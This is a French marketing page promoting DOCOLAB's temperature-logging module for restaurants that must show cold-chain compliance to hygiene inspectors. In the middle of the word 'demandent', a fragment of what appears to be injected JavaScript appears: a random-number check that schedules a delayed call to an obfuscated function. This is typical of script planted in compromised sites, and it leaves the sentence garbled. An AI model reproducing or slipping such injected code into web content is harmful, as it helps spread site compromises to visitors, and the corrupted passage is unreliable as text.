La solution DOCOLAB pour respecter la chaîne du froid !

Vous dirigez un restaurant ou une entreprise utilisant des réfrigérateurs congélateur ou chambres froides ? Vous savez donc que vous devez respecter la chaîne du froid, c’est impératif pour éviter tout risque sanitaire et vous devez en justifier ! 

Pour respecter la chaîne du froid, il faut s’assurer de maintenir les produits réfrigérés ou surgelés. Que ce soit pour une température positive ou négative, il faut être conforme à la réglementation ou à leur étiquetage.

DOCOLAB vous informe que la réglementation n’impose pas de relever systématiquement les températures.

Mais comment justifier auprès de l’inspecteur du respect de la chaine du froid ? Et comment garantir que les denrées soient bien conservées selon les règles sanitaires ?

En effet, le seul moyen fiable, efficace et non contestable c’est de suivre les températures de vos équipements…Et les inspecteurs de l’Hygiène demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andent de justifier de ces relevés à chaque inspection !

Exemple de PDF Mesures
Exemple de mesures

Notre solution en matière de suivi et relevé de température vous permettra d’effectuer tous ces contrôles et suivre l’évolution de vos températures.

Avec le module « Équipement » il est possible de suivre l’évolution de vos températures, de contrôler le bon fonctionnement, mais surtout de générer des relevés automatiquement. Ces relevés vont vous permettre d’attester du respect de la chaine du froid… la boucle est bouclée !

La solution de DOCOLAB en matière de relevé de température : « Équipement »  

Infos complémentaires : https://www.economie.gouv.fr/dgccrf/entree-en-vigueur-du-nouveau-reglement-sur-les-controles-officiels-de-la-chaine-alimentaire